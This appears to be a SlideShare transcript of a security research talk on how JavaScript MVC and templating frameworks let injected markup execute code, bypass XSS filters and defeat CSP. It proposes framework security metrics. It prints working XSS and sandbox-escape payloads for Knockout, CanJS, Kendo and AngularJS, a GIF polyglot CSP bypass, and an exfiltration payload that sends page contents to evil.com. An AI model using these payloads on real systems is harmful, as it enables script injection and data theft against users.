SlideShare a Scribd company logo

JSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks

Mario Heiderich
Mario Heiderich

The document discusses JavaScript MVC and templating frameworks and security issues found during penetration testing. Several frameworks were found to execute arbitrary JavaScript from markup in dangerous ways due to overuse of eval-like functions and lack of separation between code and content. This could lead to bypassing of content security policies. Metrics are proposed to evaluate frameworks on security practices like sandboxing and preventing injection into templates. While challenges exist, following best practices like strict separation of code and content could help frameworks improve security.

TechnologyBusiness
1 of 56
Download to read offline
JSMVCOMFG To sternly look at JavaScript MVC and Templating Frameworks A presentation by Mario Heiderich mario@cure53.de || @0x6D6172696F
Infosec Hobgoblin ● Dr.-Ing. Mario Heiderich ● Researcher and Post-Doc, Ruhr-Uni Bochum – ● PhD Thesis on Client Side Security and Defense Founder of Cure53 – – Consulting, Workshops, Trainings – ● Penetration Testing Firm Simply the Best Company of the World Published author and international speaker – Specialized in HTML5 and SVG Security – JavaScript, XSS and Client Side Attacks ● HTML5 Security Cheatsheet ● And something new! – @0x6D6172696F – mario@cure53.de
Today ● JavaScript MVC & Templating Frameworks ● Why? Because they are becoming popular ● Yes, we have numbers, wait for it... ● And they are special ● Are there security flaws? ● If yes (heh.. if..) what can we learn from them?
What are they ● Written in JavaScript ● Often huge ● Often very complex ● Often maintained by corporations ● Interfaces to enable different coding styles ● Extending, optimizing, changing ● The way developers work with JavaScript ● The way web applications used to work
What do they do? ● Claims ● ● ● ● “More productive out of the box” EmberJS “AngularJS lets you extend HTML vocabulary for your application” AngularJS “Fast templates, responsive widgets” “Simple and intuitive, powerful and extensible, lightning fast” JsRender CanJS
Examples <script type="text/x-handlebars"> {{outlet}} </script> <script type="text/x-handlebars" id="x"> <h1>People</h1> <ul> {{#each model}} <li>Hello, <b>{{fullName}}</b>! </li> App = Ember.Application.create(); App.Person = Ember.Object.extend({ firstName: null, lastName: null, fullName: function() { return this.get('firstName') + " " + this.get('lastName'); }.property('firstName', 'lastName') }); App.IndexRoute = Ember.Route.extend({ model: function() { var people = [ {{/each}} App.Person.create({ </ul> firstName: "Frank", </script> lastName: "N. Stein" }) ]; return people; }});
Examples <!doctype html> <html ng-app> <head> <script src="angular.min.js"></script> </head> <body> <div> <label>Name:</label> <input type="text" ng-model="yourName" placeholder="Your name"> <hr> <h1>Hello {{yourName}}!</h1> </div> </body> </html>
Examples <div class="liveExample" id="x"> <select data-bind="options: tickets, optionsCaption: 'Choose...', optionsText: 'name', value: chosenTicket"> <option value="">Economy</option> <option value="">Business</option> <option value="">First Class</option> </select> <button data-bind="enable: chosenTicket, click: resetTicket" disabled="">Clear</button> <p data-bind="with: chosenTicket"></p> <script type="text/javascript"> function TicketsViewModel() { this.tickets = [ { name: "Economy", price: 199.95 }, { name: "Business", price: 449.22 }, { name: "First Class", price: 1199.99 } ]; this.chosenTicket = ko.observable(); this.resetTicket = function() { this.chosenTicket(null) } } ko.applyBindings(new TicketsViewModel(), document.getElementById("x")); </script> </div> Binding stuff Raw Data! Puttin' it togetha
So.. ● JSMVC Frameworks do the following ● They extend the DOM ● They “abstractify” the DOM ● They provide new interfaces ● They often use script-templates or “data blocks” “The script element allows authors to include HTML5 HTML5 Approved! Approved! dynamic script and data blocks in their documents.” – – Sometimes ERB-style – ● Often Mustache-style Sometimes something completely different They often use markup-sugar – Custom elements, <hellokitty> – HTML5 data attributes WHATWG
Mustache ● Specified in 2009 by Wanstrath ● {{ stuff }} ● {{#is_true}} Bla {{/is_true}
JSMVC and Security ● Initial rationale for security research ● ● ● It's trending, it's complex, it's different What else do we need... nothing Poke-first, analyze later ● ● ● Pick a target, thanks TodoMVC! Explore debugging possibilities Goal: Execute arbitrary JavaScript, maybe more ● ● Using otherwise uncommon ways ● ● Using the JSMVC capabilities Assume injection, assume conventional XSS filter After poking, derive a metric for JSMMVC security
Pokes ● Why not start with KnockoutJS <script src="knockout-2.3.0.js"></script> <div data-bind="x:alert(1)" /> <script> ko.applyBindings(); </script>
Wait... ● JavaScript from within a data-attribute? ● No extra magic, just the colon? ● That's right ● See where we are heading with this? ● Knockout knocks out XSS filters ● ● Chrome's XSS Auditor ● ● IE's XSS Filter Anything that allows data attributes This behavior breaks existing security assumptions!
The reason ● “eval” via “Function” parseBindingsString: function(b, c, d) { try { var f; if (!(f = this.Na[b])) { var g = this.Na, e, m = "with($context){with($data||{}){return{" + a.g.ea(b) + "}}}"; e = new Function("$context", "$element", m); f = g[b] = e } return f(c, d) } catch (h) { throw h.message = "Unable to parse bindings.nBindings value: " + b + "nMessage: " + h.message, h; } }
Keep pokin' ● CanJS for example <script src="jquery-2.0.3.min.js"></script> <script src="can.jquery.js"></script> <body> <script type="text/ejs" id="todoList"> <%==($a)->abc})-alert(1)-can.proxy(function(){%> </script> <script> can.view('todoList', {}); </script> </body>
Reason ● A copy of “eval” called “myEval” myEval = function(script) { eval(script); }, [...] var template = buff.join(''), out = { out: 'with(_VIEW) { with (_CONTEXT) {' + template + " " + finishTxt + "}}" }; // Use `eval` instead of creating a function, because it is easier to debug. myEval.call(out, 'this.fn = (function(_CONTEXT,_VIEW){' + out.out + '});rn//@ sourceURL=' + name + ".jjs"); return out;
And even more... <script src="jquery-1.7.1.min.js"></script> <script src="kendo.all.min.js"></script> <div id="x"># alert(1) #</div> <script> var template = kendo.template($("#x").html()); var tasks = [{ id: 1}]; var dataSource = new kendo.data.DataSource({ data: tasks }); dataSource.bind("change", function(e) { var html = kendo.render(template, this.view()); }); dataSource.read(); </script>
Keeeeep Pokin' ● AngularJS 1.1.x <script src="angular.min.js"></script> <div class="ng-app"> {{constructor.constructor('alert(1)')()}} </div> ● Or this – even with encoded mustaches <script src="angular.min.js"></script> <div class="ng-app"> &#x7b;&#x7b;constructor.constructor('alert(1)')()&#x7d;&#x7d; </div>
Reason ● “eval” via “Function” var code = 'var l, fn, p;n'; forEach(pathKeys, function(key, index) { code += 'if(s === null || s === undefined) return s;n' + 'l=s;n' + 's=' + (index // we simply dereference 's' on any .dot notation ? 's' // but if we are first then we check locals first, and if so read it first : '((k&&k.hasOwnProperty("' + key + '"))?k:s)') + '["' + key + '"]' + ';n' + […] '}n' + ' s=s.$$vn' + '}n'; }); code += 'return s;'; fn = Function('s', 'k', code); // s=scope, k=locals fn.toString = function() { return code; };
Sadly for the attacker... ● They fixed it in 1.2.x ● Dammit! ● Good test-cases too! Look... ● function ensureSafeObject(obj, fullExpression) { // nifty check if obj is Function that is fast … other contexts if (obj && obj.constructor === obj) { throw $parseMinErr('isecfn', 'Referencing Function in Angular expressions is disallowed!Expression: {0}', fullExpression); } else { return obj; }
Not that hard to solve var foo = {}; foo.bar = 123; foo.baz = 456; console.log(foo.hasOwnProperty('bar')); console.log(foo.hasOwnProperty('baz')); console.log(foo.hasOwnProperty('constructor')); console.log(foo.hasOwnProperty('__proto__')); console.log(foo.hasOwnProperty('prototype')); // // // // // true true false false false
CSP ● Most of the JSMVC will not work with CSP ● At least not without unsafe-eval ● That's not gonna help evangelize CSP ● Although there's hope – AngularJS
<div ng-app ng-csp> <div ng-app ng-csp>
AngularJS ● Features a special CSP mode ● Said to be 30% slower ● But enables AngularJS to work ● Even without unsafe-eval or other nasties ● ● Magick! It also brings back script injections
<?php header('X-Content-Security-Policy: default-src 'self'); header('Content-Security-Policy: default-src 'self'); header('X-Webkit-CSP: default-src 'self'); ?> <!doctype html> <html ng-app ng-csp> <head> <script src="angular.min.js"></script> </head> <body onclick="alert(1)"> Click me <h1 ng-mouseover="$event.view.alert(2)"> Hover me </h1> </body> Proper CSP!
How do they do it? I. Parse the “ng”-attributes II. Slice out the relevant parts III. Create anonymous functions IV. Connect them with events V. Wait for event handler to fire $element.onclick=function($event){ $event['view']['alert']('1') } ● It's technically not in-line ● Neither is any “eval” being used
So, enabling the JSMVC to work with CSP (partly) kills the protection CSP delivers? Aw, yeah, being a pen-tester these days!
“Packaged apps deliver an experience as capable as a native app, but as safe as a web page. Just like web apps, packaged apps are written in HTML5, JavaScript, and CSS.” Uhm...
“Packaged apps have access to Chrome APIs and services not available to traditional web sites. You can build powerful apps that interact with network and hardware devices, media tools, and much more.” :-O
It's bad “Ever played with Chrome Packaged Apps?” ● Very powerful tools ● Similar yet not equivalent to extensions ● Melting the barrier between web and desktop ● HTML + JS + many APIs ● CSP enabled by default ● And work great with AngularJS (of course)
Doing the Nasty ● Let's bypass CSP in CPA using Angular ● And escalate some privileges
Benign The HTML of <!doctype html> <html ng-app ng-csp> <head> <script src="angular.min.js"></script> <script src="controller.js"></script> <link rel="stylesheet" href="todo.css"> </head> <body> <h2>Todo</h2> <div ng-controller="TodoCtrl"> <span>{{remaining()}} of {{todos.length}} remaining</span> [ <a href="" ng-click="archive()">archive</a> ] <ul class="unstyled"> <li ng-repeat="todo in todos"> <input type="checkbox" ng-model="todo.done"> <span class="done-{{todo.done}}">{{todo.text}}</span> </li> </ul> </div> </body> </html> our fancy app
Benign function TodoCtrl($scope) { $scope.todos = [ {text:'learn angular', done:true}, {text:'build an angular app', done:false}]; $scope.remaining = function() { var count = 0; angular.forEach($scope.todos, function(todo) { count += todo.done ? 0 : 1; }); return count; }; $scope.archive = function() { var oldTodos = $scope.todos; $scope.todos = []; angular.forEach(oldTodos, function(todo) { if (!todo.done) $scope.todos.push(todo); }); }; } Our Controller Code, AngularJS
Benign { "manifest_version": 2, "name": "Lab3b MVC with controller", "permissions": ["webview"], "version": "1", "app": { "background": { "scripts": ["main.js"] } }, "icons": { "128": "icon.png" } } The Manifest, Permissions too
Attacked <!doctype html> <html ng-app ng-csp> <head> <script src="angular.min.js"></script> <script src="controller.js"></script> <link rel="stylesheet" href="todo.css"> </head> <body> <h2 ng-click="invalid( w=$event.view, x=w.document.createElement('webview'), x.src='http://evil.com/?'+w.btoa(w.document.body.innerHTML), w.document.body.appendChild(x) )">Todo-shmoodoo</h2> <div ng-controller="TodoCtrl"> <span>{{remaining()}} of {{todos.length}} remaining</span> [ <a href="" ng-click="archive()">archive</a> ] <ul class="unstyled"> <li ng-repeat="todo in todos"> <input type="checkbox" ng-model="todo.done"> <span class="done-{{todo.done}}">{{todo.text}}</span> </li> </ul> </div> </body> </html> Oh, Sh*t!
Happy testing – there's a lot more to find!
For example this... <div class="ng-include:'//ø.pw'">
More CSP Bypasses ● And even a much better one ● ● Upload a GIF ● ● Inject a class attribute Get a free AngularJS + HTML5 CSP Bypass Wanna see?
Let's upload a pic! <span class="ng-include:'test.gif'"> </span> Now we inject a class attribute It's a valid GIF but also contains payload! – including the image as HTML! Now it imports itself <link rel="import" href="test.gif"> Thereby loads itself as JS <script src="test.gif"></script> “And pop goes the weasel”
“It looks like we will agree to disagree on the importance of the HTML imports issue -- we don't think it's possible for a third party to execute arbitrary Javascript via the process you describe, so the risk of unsanitized HTML would be one that the developer was taking on deliberately.”
Quick Recap ● What have we seen today ● Rotten Markup-Sugar ● JavaScript exec. from data-attributes ● JavaScript exec. from any element ● JavaScript exec. within encoded mustache ● A full-blown CSP Bypass ● The reasons for all these ● Oh – and an attack against Chrome Packaged Apps ● And it was just the tip of the iceberg ● Lots of “eval” and bad coding practices
“Markup-Sugar considered dangerous”
Metrics ● While root causes persist, new challenges arise ● We need to build metrics ● After having analyzed 12 frameworks: Here's a proposal {}SEC-A Are template expressions equivalent to a JavaScript eval? {}SEC-B Is the the execution scope well isolated or sand-boxed? {}SEC-C Can arbitrary HTML elements serve as template containers? {}SEC-D Does the framework allow, encourage or even enforce separation of code and content? {}SEC-E Does the framework maintainer have a security response program? {}SEC-F Does the Framework allow safe CSP rules to be used
Conclusion ● JSMVC requires new security requirements ● No reflected content from the server within template containers ● Sometimes, everything is a template container ● Strict separation is necessary ● And there is hope! ● Maybe JSMVC eliminates XSS ● Because it changes how we design applications. ● And does by boosting and not hindering productivity ● Interested in collaborating on this? Contact me!
The End ● Questions? ● Comments?

Recommended

In the DOM, no one will hear you scream
In the DOM, no one will hear you screamIn the DOM, no one will hear you scream
In the DOM, no one will hear you scream
Mario Heiderich
 
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
Mario Heiderich
 
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Mario Heiderich
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs Blue
Will Schroeder
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows Environment
Teymur Kheirkhabarov
 
The innerHTML Apocalypse
The innerHTML ApocalypseThe innerHTML Apocalypse
The innerHTML Apocalypse
Mario Heiderich
 
An Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSAn Abusive Relationship with AngularJS
An Abusive Relationship with AngularJS
Mario Heiderich
 
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
CODE BLUE
 

Recommended

In the DOM, no one will hear you scream
In the DOM, no one will hear you screamIn the DOM, no one will hear you scream
In the DOM, no one will hear you scream
Mario Heiderich
 
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
Mario Heiderich
 
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Mario Heiderich
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs Blue
Will Schroeder
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows Environment
Teymur Kheirkhabarov
 
The innerHTML Apocalypse
The innerHTML ApocalypseThe innerHTML Apocalypse
The innerHTML Apocalypse
Mario Heiderich
 
An Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSAn Abusive Relationship with AngularJS
An Abusive Relationship with AngularJS
Mario Heiderich
 
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
CODE BLUE
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
Mikhail Egorov
 
Thick client pentesting_the-hackers_meetup_version1.0pptx
Thick client pentesting_the-hackers_meetup_version1.0pptxThick client pentesting_the-hackers_meetup_version1.0pptx
Thick client pentesting_the-hackers_meetup_version1.0pptx
Anurag Srivastava
 
Locking the Throneroom 2.0
Locking the Throneroom 2.0Locking the Throneroom 2.0
Locking the Throneroom 2.0
Mario Heiderich
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
Sergey Soldatov
 
Scriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillScriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the Sill
Mario Heiderich
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows Infrastructure
Sergey Soldatov
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
CODE BLUE
 
ORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORMORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORM
Mikhail Egorov
 
Time based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceTime based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webservice
Frans Rosén
 
The Image that called me - Active Content Injection with SVG Files
The Image that called me - Active Content Injection with SVG FilesThe Image that called me - Active Content Injection with SVG Files
The Image that called me - Active Content Injection with SVG Files
Mario Heiderich
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
Rodolfo Assis (Brute)
 
Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7
Teymur Kheirkhabarov
 
Lightweight static code analysis with semgrep
Lightweight static code analysis with semgrepLightweight static code analysis with semgrep
Lightweight static code analysis with semgrep
Null Bhubaneswar
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020
Moataz Kamel
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricks
GarethHeyes
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling Pickles
Christopher Frohoff
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows Environment
Teymur Kheirkhabarov
 
PowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingPowerShell for Practical Purple Teaming
PowerShell for Practical Purple Teaming
Nikhil Mittal
 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEM
Frans Rosén
 
How fun of privilege escalation Red Pill2017
How fun of privilege escalation Red Pill2017How fun of privilege escalation Red Pill2017
How fun of privilege escalation Red Pill2017
Ammarit Thongthua ,CISSP CISM GXPN CSSLP CCNP
 
AngularJS Security: defend your Single Page Application
AngularJS Security: defend your Single Page Application AngularJS Security: defend your Single Page Application
AngularJS Security: defend your Single Page Application
Carlo Bonamico
 
Single-Page-Application & REST security
Single-Page-Application & REST securitySingle-Page-Application & REST security
Single-Page-Application & REST security
Igor Bossenko
 

More Related Content

What's hot

Locking the Throneroom 2.0
Locking the Throneroom 2.0Locking the Throneroom 2.0
Locking the Throneroom 2.0
Mario Heiderich
 
Scriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillScriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the Sill
Mario Heiderich
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
CODE BLUE
 
The Image that called me - Active Content Injection with SVG Files
The Image that called me - Active Content Injection with SVG FilesThe Image that called me - Active Content Injection with SVG Files
The Image that called me - Active Content Injection with SVG Files
Mario Heiderich
 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEM
Frans Rosén
 

What's hot (20)

Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
 
Thick client pentesting_the-hackers_meetup_version1.0pptx
Thick client pentesting_the-hackers_meetup_version1.0pptxThick client pentesting_the-hackers_meetup_version1.0pptx
Thick client pentesting_the-hackers_meetup_version1.0pptx
 
Locking the Throneroom 2.0
Locking the Throneroom 2.0Locking the Throneroom 2.0
Locking the Throneroom 2.0
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
 
Scriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillScriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the Sill
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows Infrastructure
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
 
ORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORMORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORM
 
Time based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceTime based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webservice
 
The Image that called me - Active Content Injection with SVG Files
The Image that called me - Active Content Injection with SVG FilesThe Image that called me - Active Content Injection with SVG Files
The Image that called me - Active Content Injection with SVG Files
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
 
Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7
 
Lightweight static code analysis with semgrep
Lightweight static code analysis with semgrepLightweight static code analysis with semgrep
Lightweight static code analysis with semgrep
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricks
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling Pickles
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows Environment
 
PowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingPowerShell for Practical Purple Teaming
PowerShell for Practical Purple Teaming
 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEM
 
How fun of privilege escalation Red Pill2017
How fun of privilege escalation Red Pill2017How fun of privilege escalation Red Pill2017
How fun of privilege escalation Red Pill2017
 

Viewers also liked

AngularJS Security: defend your Single Page Application
AngularJS Security: defend your Single Page Application AngularJS Security: defend your Single Page Application
AngularJS Security: defend your Single Page Application
Carlo Bonamico
 
Single-Page-Application & REST security
Single-Page-Application & REST securitySingle-Page-Application & REST security
Single-Page-Application & REST security
Igor Bossenko
 
Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8
Mario Heiderich
 

Viewers also liked (13)

AngularJS Security: defend your Single Page Application
AngularJS Security: defend your Single Page Application AngularJS Security: defend your Single Page Application
AngularJS Security: defend your Single Page Application
 
Single-Page-Application & REST security
Single-Page-Application & REST securitySingle-Page-Application & REST security
Single-Page-Application & REST security
 
AngularJS
AngularJSAngularJS
AngularJS
 
Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8
 
Hash DoS Attack
Hash DoS AttackHash DoS Attack
Hash DoS Attack
 
(Не)безопасный frontend
(Не)безопасный frontend(Не)безопасный frontend
(Не)безопасный frontend
 
Sparkly Notebook: Interactive Analysis and Visualization with Spark
Sparkly Notebook: Interactive Analysis and Visualization with SparkSparkly Notebook: Interactive Analysis and Visualization with Spark
Sparkly Notebook: Interactive Analysis and Visualization with Spark
 
ng-owasp: OWASP Top 10 for AngularJS Applications
ng-owasp: OWASP Top 10 for AngularJS Applicationsng-owasp: OWASP Top 10 for AngularJS Applications
ng-owasp: OWASP Top 10 for AngularJS Applications
 
Comparing Hot JavaScript Frameworks: AngularJS, Ember.js and React.js - Sprin...
Comparing Hot JavaScript Frameworks: AngularJS, Ember.js and React.js - Sprin...Comparing Hot JavaScript Frameworks: AngularJS, Ember.js and React.js - Sprin...
Comparing Hot JavaScript Frameworks: AngularJS, Ember.js and React.js - Sprin...
 
Secure Your REST API (The Right Way)
Secure Your REST API (The Right Way)Secure Your REST API (The Right Way)
Secure Your REST API (The Right Way)
 
Web Wuermer
Web WuermerWeb Wuermer
Web Wuermer
 
Big Data visualization with Apache Spark and Zeppelin
Big Data visualization with Apache Spark and ZeppelinBig Data visualization with Apache Spark and Zeppelin
Big Data visualization with Apache Spark and Zeppelin
 
SlideShare 101
SlideShare 101SlideShare 101
SlideShare 101
 

Similar to JSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks

StHack 2014 - Mario "@0x6D6172696F" Heiderich - JSMVCOMFG
StHack 2014 - Mario "@0x6D6172696F" Heiderich - JSMVCOMFGStHack 2014 - Mario "@0x6D6172696F" Heiderich - JSMVCOMFG
StHack 2014 - Mario "@0x6D6172696F" Heiderich - JSMVCOMFG
StHack
 
gDayX 2013 - Advanced AngularJS - Nicolas Embleton
gDayX 2013 - Advanced AngularJS - Nicolas EmbletongDayX 2013 - Advanced AngularJS - Nicolas Embleton
gDayX 2013 - Advanced AngularJS - Nicolas Embleton
George Nguyen
 
20141002 delapsley-socalangularjs-final
20141002 delapsley-socalangularjs-final20141002 delapsley-socalangularjs-final
20141002 delapsley-socalangularjs-final
David Lapsley
 
gDayX - Advanced angularjs
gDayX - Advanced angularjsgDayX - Advanced angularjs
gDayX - Advanced angularjs
gdgvietnam
 
09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)
09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)
09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)
Igor Bronovskyy
 
Security on Rails
Security on RailsSecurity on Rails
Security on Rails
David Paluy
 

Similar to JSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks (20)

StHack 2014 - Mario "@0x6D6172696F" Heiderich - JSMVCOMFG
StHack 2014 - Mario "@0x6D6172696F" Heiderich - JSMVCOMFGStHack 2014 - Mario "@0x6D6172696F" Heiderich - JSMVCOMFG
StHack 2014 - Mario "@0x6D6172696F" Heiderich - JSMVCOMFG
 
Nicolas Embleton, Advanced Angular JS
Nicolas Embleton, Advanced Angular JSNicolas Embleton, Advanced Angular JS
Nicolas Embleton, Advanced Angular JS
 
Wt unit 2 ppts client sied technology
Wt unit 2 ppts client sied technologyWt unit 2 ppts client sied technology
Wt unit 2 ppts client sied technology
 
Wt unit 2 ppts client side technology
Wt unit 2 ppts client side technologyWt unit 2 ppts client side technology
Wt unit 2 ppts client side technology
 
GDayX - Advanced Angular.JS
GDayX - Advanced Angular.JSGDayX - Advanced Angular.JS
GDayX - Advanced Angular.JS
 
Reviewing AngularJS
Reviewing AngularJSReviewing AngularJS
Reviewing AngularJS
 
TDC2017 | Florianopolis - Trilha DevOps How we figured out we had a SRE team ...
TDC2017 | Florianopolis - Trilha DevOps How we figured out we had a SRE team ...TDC2017 | Florianopolis - Trilha DevOps How we figured out we had a SRE team ...
TDC2017 | Florianopolis - Trilha DevOps How we figured out we had a SRE team ...
 
Modern Web Technologies
Modern Web TechnologiesModern Web Technologies
Modern Web Technologies
 
Webpack
Webpack Webpack
Webpack
 
The MEAN stack
The MEAN stack The MEAN stack
The MEAN stack
 
gDayX 2013 - Advanced AngularJS - Nicolas Embleton
gDayX 2013 - Advanced AngularJS - Nicolas EmbletongDayX 2013 - Advanced AngularJS - Nicolas Embleton
gDayX 2013 - Advanced AngularJS - Nicolas Embleton
 
20141002 delapsley-socalangularjs-final
20141002 delapsley-socalangularjs-final20141002 delapsley-socalangularjs-final
20141002 delapsley-socalangularjs-final
 
Introduction to AngularJS
Introduction to AngularJSIntroduction to AngularJS
Introduction to AngularJS
 
gDayX - Advanced angularjs
gDayX - Advanced angularjsgDayX - Advanced angularjs
gDayX - Advanced angularjs
 
09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)
09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)
